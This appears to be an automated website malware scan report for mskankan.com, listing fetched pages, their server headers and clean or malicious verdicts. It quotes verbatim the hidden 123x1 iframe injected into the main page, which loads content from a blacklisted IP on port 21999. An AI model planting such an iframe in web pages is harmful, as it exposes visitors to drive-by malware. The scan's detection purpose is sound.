Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xz.mskankan.com
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://xz.mskankan.com/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://xz.mskankan.com/test404page.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:49:53 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Location: http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/test404page.js Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/test404page.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:49:55 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://www.mskankan.com/ | 200 OK Content-Length: 41618 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 222.186.34.11 <iframe src=http://222.186.34.11:21999/index.htm width=123 height=1></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>Öйú¸ßÇåÃÅ»§_×îеçÓ°ÏÂÔØ-ÂóÉп´¿´Íø</title> <META name="keywords" content="×îеçÓ°Ï ...[4289 bytes skipped]... Malicious iFrame found. size: 123x1 src: http://222.186.34.11:21999/index.htm This URL is marked by Yandex as suspicious <iframe src=http://222.186.34.11:21999/index.htm width=123 height=1> | ||
http://www.mskankan.com/skin/Default/images/Conn.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:07 GMT Accept-Ranges: bytes ETag: "686fb16fdcbcd1:24a6" Server: IIS Content-Length: 6543 Content-Location: http://www.mskankan.com/skin/Default/images/Conn.js Content-Type: application/x-javascript Last-Modified: Mon, 26 Nov 2012 17:40:12 GMT X-Powered-By: WAF/2.0 | clean |
http://www.mskankan.com/skin/default/images/conn.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:08 GMT Accept-Ranges: bytes ETag: "686fb16fdcbcd1:24a6" Server: IIS Content-Length: 6543 Content-Location: http://www.mskankan.com/skin/default/images/conn.js Content-Type: application/x-javascript Last-Modified: Mon, 26 Nov 2012 17:40:12 GMT X-Powered-By: WAF/2.0 | clean |
http://www.mskankan.com/test404page.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:08 GMT Accept-Ranges: bytes ETag: "2a70fa4f8ec9cf1:24a6" Server: IIS Content-Length: 382 Content-Location: http://www.mskankan.com/404.html?404;http://www.mskankan.com:80/test404page.js Content-Type: text/html Last-Modified: Sat, 06 Sep 2014 04:52:08 GMT Set-Cookie: safedog-flow-item=A5737D17470F6542810B6FB7AC2EF688; expires=Wen, 7-Arp-2151 19:01:24 GMT; domain=mskankan.com; path=/ X-Powered-By: WAF/2.0 | clean |
http://www.mskankan.com/404.html?404;http://www.mskankan.com:80/test404page.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:09 GMT Accept-Ranges: bytes ETag: "2a70fa4f8ec9cf1:24a6" Server: IIS Content-Length: 382 Content-Location: http://www.mskankan.com/404.html?404;http://www.mskankan.com:80/test404page.js Content-Type: text/html Last-Modified: Sat, 06 Sep 2014 04:52:08 GMT Set-Cookie: safedog-flow-item=A5737D17470F6542810B6FB7AC2EF688; expires=Wen, 7-Arp-2151 19:01:25 GMT; domain=mskankan.com; path=/ X-Powered-By: WAF/2.0 | clean |
http://xz.mskankan.com/Include/javascript/Funciton.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:03 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Location: http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/Include/javascript/Funciton.js Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/include/javascript/funciton.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:05 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/skin/Default/images/Changimages.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:05 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Location: http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/skin/Default/images/Changimages.js Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/skin/default/images/changimages.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:05 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/Advertising/2.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:06 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Location: http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/Advertising/2.js Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/advertising/2.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:09 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://js.users.51.la/4739293.js | 200 OK Content-Length: 1977 Content-Type: application/x-javascript | clean |
http://xz.mskankan.com/skin/Default/images/HiboCms.Img.Load.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:10 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Location: http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/skin/Default/images/HiboCms.Img.Load.js Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/skin/default/images/hibocms.img.load.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:10 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/Advertising/10.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:10 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Location: http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/Advertising/10.js Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/advertising/10.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:12 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xz.mskankan.com
Result:
HTTP/1.1 500 timeout
Content-Type: text/plain
Second query (visit from search engine):
GET / HTTP/1.1
Host: xz.mskankan.com
Referer: http://www.google.com/search?q=xz.mskankan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.